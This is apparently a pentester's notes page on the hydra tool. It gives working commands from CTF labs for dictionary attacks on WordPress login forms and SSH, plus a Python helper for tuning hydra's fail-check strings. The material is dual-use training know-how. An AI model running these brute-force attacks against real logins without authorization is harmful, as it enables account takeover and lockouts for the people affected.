hydra
Performed credential brute-force dictionary attacks.
Link
How I used it
Hydra is the tool I use for my password dictionary attacks against all those pesky web app login forms, assuming I don’t write my own script. But wait, there is more! It also does other protocols that I don’t feel like scripting, like SSH.
| Category | What I did | Why I did it |
|---|---|---|
| Brute-Force Password | Dictionary attack against login forms. | Quick wins from weak passwords. I like low-hanging fruit. |
| Brute-Force Usernames | Enumerate valid users on WordPress/forums. | Some logins differentiate between "wrong password" vs "unknown user". |
| Brute-Force SSH | Target SSH with common credentials. | If SSH is open with weak passwords, easiest path to shell. |
Proof
- THM Hackpark - Cracking website admin passwords.
- THM Mr. Robot - Brute-forcing the WordPress username.
- HTB Dog - Brute-forcing SSH credentials.
Commands I Use Most
Cracking Passwords
A known username (-l) with a password list (-P). The http-post-form argument is path:POST body:condition; hydra substitutes ^USER^ and ^PASS^ into the body and treats any response containing the last field, "The password you entered", as a failed guess.
```console
┌──(kali㉿kali)-[~/Documents/thm/mrrobot]
└─$ hydra -l Elliot -P fsocity.dic 10.10.145.112 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.11.55%2Fwp-admin%2F&testcookie=1:The password you entered"
```
Brute-force Username
The same module flipped around: a username list (-L) with one fixed password (-p). The fail string is the "Invalid Username" error, so any name that produces a different response (the wrong-password error an existing account returns) is reported as a hit.
```console
┌──(kali㉿kali)-[~/Documents/thm/mrrobot]
└─$ hydra -L fsocity.dic -p admin 10.10.11.55 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.11.55%2Fwp-admin%2F&testcookie=1:Invalid Username"
```
Brute-force SSH
Against sshd the module is just ssh. -t 4 caps the parallel tasks because most SSH servers throttle or drop connections at higher concurrency; hydra prints a warning recommending -t 4 for exactly this reason.
```console
┌──(kali㉿kali)-[~/Documents/htb/dog]
└─$ hydra -l tiffany -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt -t 4 10.10.11.58 ssh
```
What I learned the Hard Way
Wordlist Selection Matters
Choose those wordlists carefully. SecLists offers a bunch to play with; the xato-net top-10000 list in the SSH command above is one of them. You can also use CeWL to spider the target site and build a custom wordlist from the words it finds, which catches site-specific passwords that no generic list contains.
Choose the Right Fail Check
Consider what you choose as the fail check. For http-post-form, the string after the last colon is what hydra looks for in the response to decide that a guess failed; prefix it with S= to match a success marker instead (a redirect or a session cookie, say). If the string does not appear on every failure, every guess looks like a hit; if it also appears on success, the right password is reported as wrong. There have been boxes where I wasted a couple of hours because hydra was the right vector but didn’t work because it didn’t know the right password was right.
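The following is an added example for this page, not hydra's own code. It assembles the http-post-form argument the way the WordPress commands above spell it out, and vets a candidate fail or success string against known responses before a long run, which is the mistake described above. The three responses are constructed stand-ins for a WordPress login (not captured traffic), and the case-insensitive substring match is an assumption about how the module compares strings; confirm it against the hydra version in use.

```python
"""Pre-flight checks for a hydra http-post-form run (added example, not hydra code)."""
from urllib.parse import urlencode

# Constructed stand-ins for the three outcomes of a WordPress login attempt.
BAD_PASSWORD = ('HTTP/1.1 200 OK\r\n\r\n<div id="login_error"><strong>Error:</strong> '
                'The password you entered for the username <strong>Elliot</strong> '
                'is incorrect.</div>')
BAD_USERNAME = ('HTTP/1.1 200 OK\r\n\r\n<div id="login_error"><strong>Error:</strong> '
                'Invalid username.</div>')
LOGGED_IN = ('HTTP/1.1 302 Found\r\nLocation: /wp-admin/\r\n'
             'Set-Cookie: wordpress_logged_in_1a2b=Elliot%7C...; HttpOnly\r\n\r\n')

PLACEHOLDERS = ("^USER^", "^PASS^")


def build_form_spec(path, fields, condition):
    """Return the 'path:post-body:condition' argument for http-post-form.

    `fields` is an ordered dict of POST parameters. Values equal to ^USER^ or
    ^PASS^ are kept verbatim so hydra can substitute them; everything else is
    URL-encoded, which is why redirect_to shows up as http%3A%2F%2F... above.
    Hydra splits the argument on ':', so any colon that survives encoding is
    escaped as '\\:' as hydra's documentation prescribes.
    """
    body = "&".join(
        f"{name}={value}" if value in PLACEHOLDERS else urlencode({name: value})
        for name, value in fields.items()
    )
    return ":".join(part.replace(":", "\\:") for part in (path, body, condition))


def hydra_accepts(response, condition):
    """Mimic the module's verdict on one response.

    With no prefix or 'F=', the string marks a FAILED login, so its absence
    means success. With 'S=', the string marks a SUCCESSFUL login.
    Assumption for this demo: a case-insensitive substring search over the
    whole response (headers and body).
    """
    if condition.startswith("S="):
        return condition[2:].lower() in response.lower()
    if condition.startswith("F="):
        condition = condition[2:]
    return condition.lower() not in response.lower()


def vet_condition(condition, failures, successes):
    """List the known responses a condition would misclassify.

    `failures` and `successes` map a label to a response. Returns
    (label, kind) pairs; an empty list means every known failure would be
    rejected and every known success reported as a hit.
    """
    problems = []
    for label, response in failures.items():
        if hydra_accepts(response, condition):
            problems.append((label, "false positive"))
    for label, response in successes.items():
        if not hydra_accepts(response, condition):
            problems.append((label, "false negative"))
    return problems


# Field order and values taken from the wp-login.php commands above.
WP_FIELDS = {
    "log": "^USER^", "pwd": "^PASS^", "wp-submit": "Log In",
    "redirect_to": "http://10.10.11.55/wp-admin/", "testcookie": "1",
}

if __name__ == "__main__":
    print(build_form_spec("/wp-login.php", WP_FIELDS, "The password you entered"))
    # "The password you entered" is only safe once the username is known: an
    # unknown user produces a different error, which this check flags as a
    # false positive. "login_error" or S=wordpress_logged_in survive both.
    fails = {"bad password": BAD_PASSWORD, "bad username": BAD_USERNAME}
    wins = {"logged in": LOGGED_IN}
    for cond in ("The password you entered", "login_error", "S=wordpress_logged_in"):
        print(f"{cond!r}: {vet_condition(cond, fails, wins) or 'ok'}")
```

Run it against responses you captured yourself with curl (one known-bad username, one known-bad password for a real account, and, if you have a test account, one success) before starting hydra; ten seconds of checking beats hours of a run that was never going to report a hit.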
When hydra Let Me Down
Brute-force protections are a thing. Sometimes, five incorrect passwords will get your account locked, or worse, your IP banned. Not fun calling your customer to let them know you locked yourself out. Be mindful when you choose to brute-force. Confirm the lockout threshold with the customer before you start, keep -t low, space attempts out with -W or -c, and pass -f so hydra stops at the first valid pair instead of hammering on after it already has what you need.